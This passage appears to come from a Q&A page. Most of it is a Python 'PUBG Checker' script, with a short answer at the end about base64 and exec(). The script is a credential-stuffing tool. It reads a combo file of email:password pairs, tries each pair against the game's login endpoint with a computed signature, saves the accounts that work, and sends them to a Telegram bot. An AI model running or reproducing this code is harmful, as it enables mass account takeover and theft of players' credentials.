import requests,hashlib,random,string,time

r = requests.session()
print("""
\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x96\x88\xe2\x96\x88\xe2\x95\x97   \xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97  \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97
\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91   \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d Checker
\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91   \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91  \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91   \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91   \xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91     \xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\n\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d      \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d  \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d 
@CICADA3301 @MR_50
""")
ID= input('\\x1b[0;31m[+] Enter YOUR ID : ')
token = input('\\x1b[0;31m[+] Enter TOKEN BOT : ')
headPUB = {
           "Content-Type": "application/json; charset=utf-8",
           "User-Agent": f"Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-G973N Build/PPR1.910397.817)",
           "Host": "igame.msdkpass.com",
           "Connection": "Keep-Alive",
           "Accept-Encoding": "gzip",
           "Content-Length": "126"}
def CHECK(email,pess):
    eml = email
    pas = pess
    YES = f"""
\\x1b[0;35m[\xe2\x9c\x93] WOOOOW \xf0\x9f\x98\x8d PUBG :
\\x1b[0;35m[\xe2\x9c\x93] Email: {eml}
\\x1b[0;35m[\xe2\x9c\x93] Pass: {pas}
\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81"""
    NO = f"""
\\x1b[0;33m[-] sorry \xf0\x9f\x98\xa5 PUBG :
\\x1b[0;33m[-] Email: {eml}
\\x1b[0;33m[-] Pass: {pas}
\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81\xe2\x94\x81"""
    pes = hashlib.md5(bytes(f'{pas}', encoding='utf-8')).hexdigest()
    J = hashlib.md5(bytes("/account/login?account_plat_type=3&appid=dd921eb18d0c94b41ddc1a6313889627&lang_type=tr_TR&os=1{\"account\":\""+eml+"\",\"account_type\":1,\"area_code\":\"\",\"extra_json\":\"\",\"password\":\""+pes+"\"}3ec8cd69d71b7922e2a17445840866b26d86e283",
                          encoding="utf-8")).hexdigest()
    url = f"https://igame.msdkpass.com/account/login?account_plat_type=3&appid=dd921eb18d0c94b41ddc1a6313889627&lang_type=tr_TR&os=1&sig={J}"
    daPU = "{\"account\":\""+eml+"\",\"account_type\":1,\"area_code\":\"\",\"extra_json\":\"\",\"password\":\""+pes+"\"}"
    time.sleep(0.2)
    GO=r.get(url, data=daPU,headers=headPUB).text
    if '"token"' in GO:
        print(YES)
        r.post(f'https://api.telegram.org/bot{token}/sendMessage?chat_id={ID}&text={YES}\nBY @CICADA3301 @MR_50')
        with open('NWE-PUBG.txt', 'a') as x:
            x.write(eml+':'+pas+' |@CICADA3301\n')
    else:
        print(NO)
        
def FILname():
    F = input('[+] Enter the name the combo file : ')
    try:
        for x in open(F,'r').read().splitlines():
            email = x.split(":")[0]
            pess = x.split(":")[1]
            CHECK(email,pess)
    except FileNotFoundError:
        print('\\n[-] The file name is incorrect !\n')
        return FILname()
    
FILname()
```

Answer (score 0):

The string you put in the `b64decode` function is the encoded string of the program. When you decode it, you get the normal python script. and the `exec()` function just executes the decoded string. Anyone can encode and decode it. More on [`exec()`](https://docs.python.org/3/library/functions.html#exec) & [`Base64`](https://en.wikipedia.org/wiki/Base64)